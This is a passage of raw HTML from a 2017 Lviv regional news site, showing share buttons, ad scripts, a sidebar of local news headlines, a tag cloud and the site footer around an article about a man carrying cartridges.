href="https://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F09%2F07%2Fna-pogulyanci-cholovik-rozgulyuvav-z-patronami-v-rushniku-foto%2F&amp;linkname=%D0%9D%D0%B0%20%D0%9F%D0%BE%D0%B3%D1%83%D0%BB%D1%8F%D0%BD%D1%86%D1%96%20%D1%87%D0%BE%D0%BB%D0%BE%D0%B2%D1%96%D0%BA%20%D1%80%D0%BE%D0%B7%D0%B3%D1%83%D0%BB%D1%8E%D0%B2%D0%B0%D0%B2%20%D0%B7%20%D0%BF%D0%B0%D1%82%D1%80%D0%BE%D0%BD%D0%B0%D0%BC%D0%B8%20%D0%B2%20%D1%80%D1%83%D1%88%D0%BD%D0%B8%D0%BA%D1%83%20%28%D1%84%D0%BE%D1%82%D0%BE%29" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_google_plus" href="https://www.addtoany.com/add_to/google_plus?linkurl=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F09%2F07%2Fna-pogulyanci-cholovik-rozgulyuvav-z-patronami-v-rushniku-foto%2F&amp;linkname=%D0%9D%D0%B0%20%D0%9F%D0%BE%D0%B3%D1%83%D0%BB%D1%8F%D0%BD%D1%86%D1%96%20%D1%87%D0%BE%D0%BB%D0%BE%D0%B2%D1%96%D0%BA%20%D1%80%D0%BE%D0%B7%D0%B3%D1%83%D0%BB%D1%8E%D0%B2%D0%B0%D0%B2%20%D0%B7%20%D0%BF%D0%B0%D1%82%D1%80%D0%BE%D0%BD%D0%B0%D0%BC%D0%B8%20%D0%B2%20%D1%80%D1%83%D1%88%D0%BD%D0%B8%D0%BA%D1%83%20%28%D1%84%D0%BE%D1%82%D0%BE%29" title="Google+" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd a2a_counter addtoany_share_save" href="https://www.addtoany.com/share"></a></div></div><!-- Facebook Comments Plugin for WordPress: http://peadig.com/wordpress-plugins/facebook-comments/ --><div class="fb-comments" data-href="http://gazeta.lviv.ua/2017/09/07/na-pogulyanci-cholovik-rozgulyuvav-z-patronami-v-rushniku-foto/" data-numposts="20" data-width="100%" data-colorscheme="light"></div>                    </div>
                    <div class="single-ads-wrap"><aside class="all-devices  ads-widget gazet-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Банер під статею -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9951724072058821"
     data-ad-slot="5412064588"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></aside></div>
					<div class="entry-tags">Позначки: <a href="http://gazeta.lviv.ua/tag/patrulna-policiya/" rel="tag">патрульна поліція</a></div>                </div>
            </div>
            
    <div class="column_left"><aside id="left-news-widget-2" class="all-devices  widget left_news_widget"><div class="widget_title"><a href="http://gazeta.lviv.ua/novini/">Новини</a></div><div class="widget_content"><div class="news-posts-list"><div class="post-item news-item strong"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-07T12:25:20+00:00">12:25, Чт. - 07 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/07/sixivchani-pishayutsya-svoyim-rajonom-ne-doviryayut-centralnij-vladi/">Сихівчани пишаються своїм районом і не довіряють центральній владі</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-07T12:02:44+00:00">12:02, Чт. - 07 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/07/vid-zavtra-perekriyut-rux-transportnu-na-zelenij-zhitlovogo-masivu-pasichnij/">Від завтра перекриють рух транспорту на Зеленій – до житлового масиву «Пасічний»</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-07T11:29:16+00:00">11:29, Чт. - 07 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/07/unaslidok-dtp-na-lvivshhini-zaginuv-16-richnij-velosipedist/">Унаслідок ДТП на Львівщині загинув 16-річний велосипедист</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-07T10:57:30+00:00">10:57, Чт. - 07 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/07/sogodni-u-lvovi-vshanovuyut-pam-yat-josifa-slipogo/">Сьогодні у Львові вшановують пам’ять Йосифа Сліпого</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-07T10:33:25+00:00">10:33, Чт. - 07 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/07/ogolosheno-peremozhciv-konkursu-moya-knizhkova-policya-2/">Оголошено переможців конкурсу «Моя книжкова полиця»</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-07T10:08:18+00:00">10:08, Чт. - 07 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/07/v-subotu-u-lvovi-situativno-perekrivatimut-rux-transportu-na-lichakivskij-v-centri/">В суботу у Львові ситуативно перекриватимуть рух транспорту на Личаківській і в центрі</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-07T09:40:16+00:00">09:40, Чт. - 07 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/07/na-pogulyanci-cholovik-rozgulyuvav-z-patronami-v-rushniku-foto/">На Погулянці чоловік розгулював з патронами в рушнику (фото)</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-07T09:04:48+00:00">09:04, Чт. - 07 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/07/na-lvivshhini-zmagayutsya-brigadi-ekstrenoyi-medichnoyi-dopomogi/">На Львівщині змагаються бригади екстреної медичної допомоги</a></h3></div></div><div class="post-item news-item strong"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-06T21:32:18+00:00">21:32, Ср. - 06 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/06/chajldfri-po-ukrayinski-filosofiya-komfortu-chi-teroru/">Чайлдфрі по-українськи: філософія комфорту чи терору?</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-06T20:47:11+00:00">20:47, Ср. - 06 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/06/mediki-nagaduyut-yak-vberegtisya-vid-otruyennya-gribami/">Медики нагадують, як вберегтися від отруєння грибами</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-06T19:45:03+00:00">19:45, Ср. - 06 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/06/lvivski-mitniki-zapobigli-nezakonnomu-peremishhennyu-zbroyi/">Львівські митники запобігли незаконному переміщенню зброї</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-06T19:09:59+00:00">19:09, Ср. - 06 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/06/sogodni-u-lvovi-marshrutka-zitknulasya-z-legkovikom-foto/">Сьогодні у Львові маршрутка зіткнулася з легковиком (фото)</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-06T18:13:58+00:00">18:13, Ср. - 06 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/06/uprodovzh-veresnya-vidbudetsya-seriya-obgovoren-gromadskix-prostoriv-na-vulici-stepana-banderi/">Упродовж вересня відбудеться серія обговорень громадських просторів на вулиці Степана Бандери</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-06T17:22:22+00:00">17:22, Ср. - 06 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/06/zatrimano-grupu-shaxrayiv-yaki-oshukali-ponad-pivsotni-gromadyan/">Затримано групу шахраїв, які ошукали понад півсотні громадян</a></h3></div></div><div class="post-item news-item strong"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-06T17:03:10+00:00">17:03, Ср. - 06 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/06/stare-tramvajne-depo-u-lvovi-viddali-investoram/">Старе трамвайне депо у Львові віддали інвесторам (відео)</a></h3></div></div><div class="post-item news-item strong"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-06T16:42:50+00:00">16:42, Ср. - 06 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/06/yaroslav-dubnevich-z-kiyeva-cherez-lviv-varshavu-parizha-prolyazhe-majbutnye-transkordonne-zaliznichne-spoluchennya/">Ярослав Дубневич: «З Києва, через Львів і Варшаву до Парижа проляже майбутнє транскордонне залізничне сполучення»</a></h3></div></div><div class="post-item news-item strong"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-06T16:13:01+00:00">16:13, Ср. - 06 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/06/na-rivnenshhini-vnaslidok-dtp-zaginuli-p-yatero-osib-politologi-ta-zhurnalist-foto/">На Рівненщині внаслідок ДТП загинули п’ятеро осіб: політологи та журналіст</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-06T15:55:03+00:00">15:55, Ср. - 06 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/06/ekspres-marshruti-vid-zaxidna-yixatimut-primiskogo-vokzalu/">Експрес-маршрути від АС «Західна» їхатимуть до Приміського вокзалу</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-06T15:32:36+00:00">15:32, Ср. - 06 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/06/lvivski-faxivci-pridbali-unikalne-obladnannya-dlya-dityachoyi-likarni/">Львівські ІТ-фахівці придбали унікальне обладнання для дитячої лікарні</a></h3></div></div><div class="post-item news-item strong"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-06T15:26:36+00:00">15:26, Ср. - 06 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/06/vdoma-v-ofisax-diminskogo-shukali-zrazki-dnk-gerashhenko/">Вдома і в офісах Димінського шукали зразки ДНК &#8211; Геращенко</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-06T15:01:36+00:00">15:01, Ср. - 06 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/06/vodij-utikav-vid-patrulnix-spershu-avtivkoyu-potim-pishki/">Водій утікав від патрульних спершу автівкою, а потім пішки</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-06T14:22:56+00:00">14:22, Ср. - 06 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/06/meshkanec-ternopilshhini-yixav-u-polshhu-z-pasportom-brata/">Мешканець Тернопільщини їхав у Польщу з паспортом брата</a></h3></div></div><div class="post-item news-item"><div class="entry advertising"><div class="item-meta">
				<time class="item-date" datetime="2017-09-06T14:00:15+00:00">14:00, Ср. - 06 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/06/lvivskij-ukrop-doluchivsya-vseukrayinskoyi-akciyi-pidtrimki-avtomobilnogo-bezvizu/">Львівський УКРОП долучився до всеукраїнської акції підтримки автомобільного «безвізу»</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-06T13:38:01+00:00">13:38, Ср. - 06 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/06/priznacheno-novogo-direktora-lk-atp-1/">Призначено нового директора ЛК «АТП № 1»</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-09-06T13:02:20+00:00">13:02, Ср. - 06 Вер. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/09/06/chetvero-vchiteliv-zi-lvivshhini-uvijshli-dvadcyatki-najkrashhix-za-versiyeyu-global-teacher-prize-prizvishha/">Четверо вчителів зі Львівщини увійшли до двадцятки найкращих за версією Global Teacher Prize (прізвища)</a></h3></div></div></div></div></aside></div>
        </div>
        
    <div class="column_right"><aside id="spec-project-widget-3" class="all-devices  widget spec_project_widget"><div class="widget_title">Громадський бюджет</div><div class="widget_content"><div class="spec_item clearfix"><div class="thumb"><a href="http://gazeta.lviv.ua/2017/08/15/u-lvovi-startuvav-drugij-sezon-gromadskogo-byudzhetu-yak-podati-proekt/"><img src="http://gazeta.lviv.ua/wp-content/uploads/2017/08/20819585_1701518910155288_8444531865089734195_o-1-1024x641.jpg" alt="У Львові стартував другий сезон Громадського бюджету. Як подати проект?"></a></div><div class="entry"><a href="http://gazeta.lviv.ua/2017/08/15/u-lvovi-startuvav-drugij-sezon-gromadskogo-byudzhetu-yak-podati-proekt/">У Львові стартував другий сезон Громадського бюджету. Як подати проект?</a></div></div></div></aside><aside class="all-devices  widget gazet-widget"><a href="http://www.moyo.ua" target="_blank"><img width="300" height="250" src='http://gazeta.lviv.ua/wp-content/uploads/2017/04/moyoopt.gif' alt='' title='moyoopt' /></a></aside><aside id="posts-by-tags-widget-2" class="all-devices purple-border widget category_posts_widget"><div class="widget_title">Читайте також</div><div class="widget_content"><div class="category-posts-list"><div class="post-item"><div class="thumb"><a href="http://gazeta.lviv.ua/2017/09/06/vodij-utikav-vid-patrulnix-spershu-avtivkoyu-potim-pishki/"><img width="300" height="180" src="http://gazeta.lviv.ua/wp-content/uploads/2017/09/21318948_1740705182897913_2944122330305886275_o-300x180.jpg" class="attachment-post-thumb size-post-thumb wp-post-image" alt="" /></a></div><div class="entry">
			<h3><a href="http://gazeta.lviv.ua/2017/09/06/vodij-utikav-vid-patrulnix-spershu-avtivkoyu-potim-pishki/">Водій утікав від патрульних спершу автівкою, а потім пішки</a></h3><div class="item-meta">
				<time class="item-date" datetime="2017-09-06T15:01:36+00:00">15:01, Ср. - 06 Вер. 2017</time>&nbsp;|&nbsp;
					<span class="item-author"></span>&nbsp;<span class="item-views"><i class="fa fa-eye"></i> 254</span>&nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/09/06/vodij-utikav-vid-patrulnix-spershu-avtivkoyu-potim-pishki/"></span></div>
		</div></div></div></div></aside><aside id="category-posts-widget-3" class="all-devices purple-border widget category_posts_widget"><div class="widget_title"><a href="http://gazeta.lviv.ua/novini/">Новини</a></div><div class="widget_content"><div class="category-posts-list"><div class="post-item"><div class="thumb"><a href="http://gazeta.lviv.ua/2017/09/07/sixivchani-pishayutsya-svoyim-rajonom-ne-doviryayut-centralnij-vladi/"><img width="300" height="180" src="http://gazeta.lviv.ua/wp-content/uploads/2017/09/23_big-300x180.jpg" class="attachment-post-thumb size-post-thumb wp-post-image" alt="" /></a></div><div class="entry">
			<h3><a href="http://gazeta.lviv.ua/2017/09/07/sixivchani-pishayutsya-svoyim-rajonom-ne-doviryayut-centralnij-vladi/">Сихівчани пишаються своїм районом і не довіряють центральній владі</a></h3><div class="item-meta">
				<time class="item-date" datetime="2017-09-07T12:25:20+00:00">12:25, Чт. - 07 Вер. 2017</time>&nbsp;|&nbsp;
					<span class="item-author"><a href="http://gazeta.lviv.ua/author/dzyama/">Тетяна Дзяма</a></span>&nbsp;<span class="item-views"><i class="fa fa-eye"></i> 27</span>&nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/09/07/sixivchani-pishayutsya-svoyim-rajonom-ne-doviryayut-centralnij-vladi/"></span></div>
		</div></div><div class="post-item"><div class="thumb"><a href="http://gazeta.lviv.ua/2017/09/07/vid-zavtra-perekriyut-rux-transportnu-na-zelenij-zhitlovogo-masivu-pasichnij/"><img width="300" height="180" src="http://gazeta.lviv.ua/wp-content/uploads/2017/09/remont-dorogi-300x180.jpg" class="attachment-post-thumb size-post-thumb wp-post-image" alt="" /></a></div><div class="entry">
			<h3><a href="http://gazeta.lviv.ua/2017/09/07/vid-zavtra-perekriyut-rux-transportnu-na-zelenij-zhitlovogo-masivu-pasichnij/">Від завтра перекриють рух транспорту на Зеленій – до житлового масиву «Пасічний»</a></h3><div class="item-meta">
				<time class="item-date" datetime="2017-09-07T12:02:44+00:00">12:02, Чт. - 07 Вер. 2017</time>&nbsp;|&nbsp;
					<span class="item-author"></span>&nbsp;<span class="item-views"><i class="fa fa-eye"></i> 58</span>&nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/09/07/vid-zavtra-perekriyut-rux-transportnu-na-zelenij-zhitlovogo-masivu-pasichnij/"></span></div>
		</div></div><div class="post-item"><div class="without-thumb"><div class="entry">
			<h3><a href="http://gazeta.lviv.ua/2017/09/07/unaslidok-dtp-na-lvivshhini-zaginuv-16-richnij-velosipedist/">Унаслідок ДТП на Львівщині загинув 16-річний велосипедист</a></h3><div class="item-meta">
				<time class="item-date" datetime="2017-09-07T11:29:16+00:00">11:29, Чт. - 07 Вер. 2017</time>&nbsp;|&nbsp;
					<span class="item-author"></span>&nbsp;<span class="item-views"><i class="fa fa-eye"></i> 60</span>&nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/09/07/unaslidok-dtp-na-lvivshhini-zaginuv-16-richnij-velosipedist/"></span></div>
		</div></div></div></div></div></aside><aside class="all-devices  widget gazet-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Хмарочос -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:600px"
     data-ad-client="ca-pub-9951724072058821"
     data-ad-slot="3155590425"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></aside><aside id="tag_cloud-2" class="all-devices purple-border widget widget_tag_cloud"><div class="widget_title">Позначки</div><div class="tagcloud"><a href="http://gazeta.lviv.ua/tag/ato/" class="tag-cloud-link tag-link-682 tag-link-position-1" style="font-size: 9.6390243902439pt;" aria-label="АТО (94 елементи)">АТО</a>
<a href="http://gazeta.lviv.ua/tag/gribovizhi/" class="tag-cloud-link tag-link-1326 tag-link-position-2" style="font-size: 8pt;" aria-label="Грибовичі (54 елементи)">Грибовичі</a>
<a href="http://gazeta.lviv.ua/tag/dsns/" class="tag-cloud-link tag-link-265 tag-link-position-3" style="font-size: 12.507317073171pt;" aria-label="ДСНС (251 елемент)">ДСНС</a>
<a href="http://gazeta.lviv.ua/tag/dtp/" class="tag-cloud-link tag-link-67 tag-link-position-4" style="font-size: 14.829268292683pt;" aria-label="ДТП (551 елемент)">ДТП</a>
<a href="http://gazeta.lviv.ua/tag/dfs/" class="tag-cloud-link tag-link-1258 tag-link-position-5" style="font-size: 9.980487804878pt;" aria-label="ДФС (107 елементів)">ДФС</a>
<a href="http://gazeta.lviv.ua/tag/ekonomika/" class="tag-cloud-link tag-link-2074 tag-link-position-6" style="font-size: 9.9121951219512pt;" aria-label="Економіка (103 елементи)">Економіка</a>
<a href="http://gazeta.lviv.ua/tag/kiyiv/" class="tag-cloud-link tag-link-1142 tag-link-position-7" style="font-size: 8.2731707317073pt;" aria-label="Київ (59 елементів)">Київ</a>
<a href="http://gazeta.lviv.ua/tag/lkp-lev/" class="tag-cloud-link tag-link-160 tag-link-position-8" style="font-size: 8.3414634146341pt;" aria-label="ЛКП Лев (60 елементів)">ЛКП Лев</a>
<a href="http://gazeta.lviv.ua/tag/lmr/" class="tag-cloud-link tag-link-276 tag-link-position-9" style="font-size: 9.2975609756098pt;" aria-label="ЛМР (85 елементів)">ЛМР</a>
<a href="http://gazeta.lviv.ua/tag/loda/" class="tag-cloud-link tag-link-232 tag-link-position-10" style="font-size: 13.463414634146pt;" aria-label="ЛОДА (346 елементів)">ЛОДА</a>
<a href="http://gazeta.lviv.ua/tag/lvivska-filarmoniya/" class="tag-cloud-link tag-link-262 tag-link-position-11" style="font-size: 8.3414634146341pt;" aria-label="Львівська філармонія (60 елементів)">Львівська філармонія</a>
<a href="http://gazeta.lviv.ua/tag/lvivski-novini/" class="tag-cloud-link tag-link-2043 tag-link-position-12" style="font-size: 22pt;" aria-label="Львівські новини (6&nbsp;160 елементів)">Львівські новини</a>
<a href="http://gazeta.lviv.ua/tag/misto/" class="tag-cloud-link tag-link-1776 tag-link-position-13" style="font-size: 10.59512195122pt;" aria-label="Місто (132 елементи)">Місто</a>
<a href="http://gazeta.lviv.ua/tag/privatbank/" class="tag-cloud-link tag-link-87 tag-link-position-14" style="font-size: 10.321951219512pt;" aria-label="ПриватБанк (119 елементів)">ПриватБанк</a>
<a href="http://gazeta.lviv.ua/tag/sbu/" class="tag-cloud-link tag-link-636 tag-link-position-15" style="font-size: 9.0926829268293pt;" aria-label="СБУ (78 елементів)">СБУ</a>
<a href="http://gazeta.lviv.ua/tag/suspilstvo/" class="tag-cloud-link tag-link-2480 tag-link-position-16" style="font-size: 16.4pt;" aria-label="Суспільство (926 елементів)">Суспільство</a>
<a href="http://gazeta.lviv.ua/tag/uku/" class="tag-cloud-link tag-link-197 tag-link-position-17" style="font-size: 8.0682926829268pt;" aria-label="УКУ (55 елементів)">УКУ</a>
<a href="http://gazeta.lviv.ua/tag/avto/" class="tag-cloud-link tag-link-77 tag-link-position-18" style="font-size: 9.0926829268293pt;" aria-label="авто (79 елементів)">авто</a>
<a href="http://gazeta.lviv.ua/tag/vistavka/" class="tag-cloud-link tag-link-140 tag-link-position-19" style="font-size: 9.7756097560976pt;" aria-label="виставка (99 елементів)">виставка</a>
<a href="http://gazeta.lviv.ua/tag/departament-z-pitan-civilnogo-zaxistu-loda/" class="tag-cloud-link tag-link-480 tag-link-position-20" style="font-size: 10.526829268293pt;" aria-label="департамент з питань цивільного захисту ЛОДА (129 елементів)">департамент з питань цивільного захисту ЛОДА</a>
<a href="http://gazeta.lviv.ua/tag/ekologiya/" class="tag-cloud-link tag-link-2487 tag-link-position-21" style="font-size: 8.5463414634146pt;" aria-label="екологія (65 елементів)">екологія</a>
<a href="http://gazeta.lviv.ua/tag/za-kordonom/" class="tag-cloud-link tag-link-2525 tag-link-position-22" style="font-size: 9.980487804878pt;" aria-label="за кордоном (105 елементів)">за кордоном</a>
<a href="http://gazeta.lviv.ua/tag/zdorov-ya/" class="tag-cloud-link tag-link-1688 tag-link-position-23" style="font-size: 11.824390243902pt;" aria-label="здоров&#039;я (197 елементів)">здоров&#039;я</a>
<a href="http://gazeta.lviv.ua/tag/konkurs/" class="tag-cloud-link tag-link-73 tag-link-position-24" style="font-size: 9.1609756097561pt;" aria-label="конкурс (80 елементів)">конкурс</a>
<a href="http://gazeta.lviv.ua/tag/kontrabanda/" class="tag-cloud-link tag-link-309 tag-link-position-25" style="font-size: 8.409756097561pt;" aria-label="контрабанда (62 елементи)">контрабанда</a>
<a href="http://gazeta.lviv.ua/tag/kradizhka/" class="tag-cloud-link tag-link-64 tag-link-position-26" style="font-size: 13.190243902439pt;" aria-label="крадіжка (313 елементів)">крадіжка</a>
<a href="http://gazeta.lviv.ua/tag/kultura/" class="tag-cloud-link tag-link-1663 tag-link-position-27" style="font-size: 11.482926829268pt;" aria-label="культура (178 елементів)">культура</a>
<a href="http://gazeta.lviv.ua/tag/kuxnya/" class="tag-cloud-link tag-link-207 tag-link-position-28" style="font-size: 8.5463414634146pt;" aria-label="кухня (65 елементів)">кухня</a>
<a href="http://gazeta.lviv.ua/tag/lvivska-oblasna-rada/" class="tag-cloud-link tag-link-2241 tag-link-position-29" style="font-size: 11.00487804878pt;" aria-label="львівська обласна рада (149 елементів)">львівська обласна рада</a>
<a href="http://gazeta.lviv.ua/tag/osvita/" class="tag-cloud-link tag-link-958 tag-link-position-30" style="font-size: 9.4341463414634pt;" aria-label="освіта (89 елементів)">освіта</a>
<a href="http://gazeta.lviv.ua/tag/pogoda/" class="tag-cloud-link tag-link-195 tag-link-position-31" style="font-size: 10.8pt;" aria-label="погода (141 елемент)">погода</a>
<a href="http://gazeta.lviv.ua/tag/pozhezha/" class="tag-cloud-link tag-link-111 tag-link-position-32" style="font-size: 12.575609756098pt;" aria-label="пожежа (258 елементів)">пожежа</a>
<a href="http://gazeta.lviv.ua/tag/policiya/" class="tag-cloud-link tag-link-68 tag-link-position-33" style="font-size: 16.4pt;" aria-label="поліція (929 елементів)">поліція</a>
<a href="http://gazeta.lviv.ua/tag/prikordonniki/" class="tag-cloud-link tag-link-359 tag-link-position-34" style="font-size: 12.234146341463pt;" aria-label="прикордонники (230 елементів)">прикордонники</a>
<a href="http://gazeta.lviv.ua/tag/prokuratura-lvivskoyi-oblasti/" class="tag-cloud-link tag-link-1041 tag-link-position-35" style="font-size: 11.687804878049pt;" aria-label="прокуратура (188 елементів)">прокуратура</a>
<a href="http://gazeta.lviv.ua/tag/remont-dorig/" class="tag-cloud-link tag-link-2893 tag-link-position-36" style="font-size: 8.6146341463415pt;" aria-label="ремонт доріг (66 елементів)">ремонт доріг</a>
<a href="http://gazeta.lviv.ua/tag/svyato/" class="tag-cloud-link tag-link-2583 tag-link-position-37" style="font-size: 9.4341463414634pt;" aria-label="свято (88 елементів)">свято</a>
<a href="http://gazeta.lviv.ua/tag/smert/" class="tag-cloud-link tag-link-2556 tag-link-position-38" style="font-size: 8.3414634146341pt;" aria-label="смерть (60 елементів)">смерть</a>
<a href="http://gazeta.lviv.ua/tag/smittya/" class="tag-cloud-link tag-link-1552 tag-link-position-39" style="font-size: 9.980487804878pt;" aria-label="сміття (107 елементів)">сміття</a>
<a href="http://gazeta.lviv.ua/tag/socium/" class="tag-cloud-link tag-link-1813 tag-link-position-40" style="font-size: 9.2975609756098pt;" aria-label="соціум (85 елементів)">соціум</a>
<a href="http://gazeta.lviv.ua/tag/sport/" class="tag-cloud-link tag-link-126 tag-link-position-41" style="font-size: 13.39512195122pt;" aria-label="спорт (338 елементів)">спорт</a>
<a href="http://gazeta.lviv.ua/tag/podiyi/" class="tag-cloud-link tag-link-2527 tag-link-position-42" style="font-size: 14.487804878049pt;" aria-label="трафунки (488 елементів)">трафунки</a>
<a href="http://gazeta.lviv.ua/tag/festival/" class="tag-cloud-link tag-link-489 tag-link-position-43" style="font-size: 9.8439024390244pt;" aria-label="фестиваль (102 елементи)">фестиваль</a>
<a href="http://gazeta.lviv.ua/tag/foto/" class="tag-cloud-link tag-link-1746 tag-link-position-44" style="font-size: 10.868292682927pt;" aria-label="фото (145 елементів)">фото</a>
<a href="http://gazeta.lviv.ua/tag/xabar/" class="tag-cloud-link tag-link-177 tag-link-position-45" style="font-size: 9.980487804878pt;" aria-label="хабар (106 елементів)">хабар</a></div>
</aside></div>    </div><!-- end content_section -->

            	<div class="footer-ads-wrap"><aside class="all-devices  ads-widget gazet-widget"><div id="riainfo_e8591355dc8ba8c645d5eb51de57e1ae"></div>
<style type="text/css">
    #riainfo_e8591355dc8ba8c645d5eb51de57e1ae .riabanner_dom.horizontal .riabanner-description {display: none}
    #riainfo_e8591355dc8ba8c645d5eb51de57e1ae .riabanner_dom.horizontal .b-text {padding: 1% 0}
</style>
<script type="text/javascript" src="https://cobrand.ria.com/js/ria_informer.js?riacode=e8591355dc8ba8c645d5eb51de57e1ae" ></script>
<div id="riainfo_e8591355dc8ba8c645d5eb51de57e1ae"></div>
<script type="text/javascript" src="https://cobrand.ria.com/js/ria_informer.js?riacode=e8591355dc8ba8c645d5eb51de57e1ae" ></script></aside></div><!-- end footer-ads-wrap -->
            </div>
        </div><!-- end_container -->
        <footer id="footer">
            <div class="center">
                <div class="footer-inner clearfix">
                    <div class="footer-left">
                    	<ul id="menu-footer-links" class="footer_links"><li id="menu-item-992" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-992"><a href="http://gazeta.lviv.ua/redakciya/">Редакція</a></li>
<li id="menu-item-993" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-993"><a href="http://gazeta.lviv.ua/reklama-na-sajti/">Реклама на сайті</a></li>
<li id="menu-item-160255" class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent menu-item-160255"><a href="http://gazeta.lviv.ua/archive/">Архів</a></li>
</ul>                                                <div class="copyright">© 2006-2017 Львівська газета<br>При використанні матеріалів джерело обов'язкове.<br>
При цитуванні в інтернеті — гіперпосилання.</div>
                                                <ul class="footer-socials">
                        	<li><a href="http://facebook.com/lvivskagazeta/" target="_blank"><i class="fa fa-facebook"></i></a></li>                                                        <li><a href="https://www.youtube.com/channel/UCJiKZoY0vRxONsAgIuzNcuQ" target="_blank"><i class="fa fa-youtube-play"></i></a></li>                                                        <li><a href="http://gazeta.lviv.ua/feed/" target="_blank"><i class="fa fa-feed"></i></a></li>                        </ul>
                    </div>
                    <div class="footer-column footer-column-1"><aside id="nav_menu-3" class="all-devices  widget widget_nav_menu"><div class="menu-footer-categories-1-container"><ul id="menu-footer-categories-1" class="menu"><li id="menu-item-56414" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-56414"><a href="http://gazeta.lviv.ua/novini/">Новини</a></li>
<li id="menu-item-160256" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160256"><a href="http://gazeta.lviv.ua/interview/">Інтерв&#8217;ю</a></li>
<li id="menu-item-160257" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160257"><a href="http://gazeta.lviv.ua/specprojects/">Спецпроекти</a></li>
